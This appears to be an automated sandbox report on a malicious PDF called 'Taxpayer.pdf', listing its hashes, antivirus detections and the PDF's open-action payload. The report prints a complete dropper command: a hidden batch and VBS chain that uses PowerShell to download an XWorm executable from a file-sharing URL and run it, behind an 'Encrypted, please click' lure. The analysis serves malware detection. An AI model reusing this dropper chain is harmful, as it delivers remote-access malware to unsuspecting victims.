Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 29, 2023, 1:37 p.m.	March 29, 2023, 1:37 p.m.

Size	1.3MB
Type	PDF document, version 1.1
MD5	`af333833c285ea114b841c4e8cde282f`
SHA256	`a2eaa11711925c2b1271b075bf2ece01de229f5e0ae0d69120ef9a35768b5257`
CRC32	`5B3D6C0E`
ssdeep	`24:WbKZ7YNqwTw+Bwky3lD6E5wkMMJIWgIXG2CSYapAakwOerXQr/3SlJiNno2fuxk2:tYAwTwowkyV1wkMYXG2lNkmXQbOiN0J`
Yara	PDF_Format_Z - PDF Format

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

The PDF file contains an open action (1 event)

Open action

<< /S /Launch /Win << /F CMD /P /c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('https://transfer.sh/get/1MeR2u/XWorm.exe', 'payload.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs PDF Encrypted. Please click >> >>

File has been identified by 13 AntiVirus engines on VirusTotal as malicious (13 events)

MicroWorld-eScan	Heur.BZC.HEV.Pantera.53.CE4B189C
FireEye	Heur.BZC.HEV.Pantera.53.CE4B189C
Sangfor	Exploit.Generic-Script.Save.0a46cc5b
Arcabit	Exploit.PDF-Dropper.Gen
BitDefender	Heur.BZC.HEV.Pantera.53.CE4B189C
VIPRE	Heur.BZC.HEV.Pantera.53.CE4B189C
TrendMicro	HEUR_PDFEXP.D
McAfee-GW-Edition	BehavesLike.PDF.Trojan.tx
Emsisoft	Exploit.PDF-Dropper.Gen (B)
GData	Exploit.PDF-Dropper.Gen
ALYac	Exploit.PDF-Dropper.Gen
MAX	malware (ai score=85)
Fortinet	VBS/Pantera.6A942003!tr

Taxpayer.pdf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All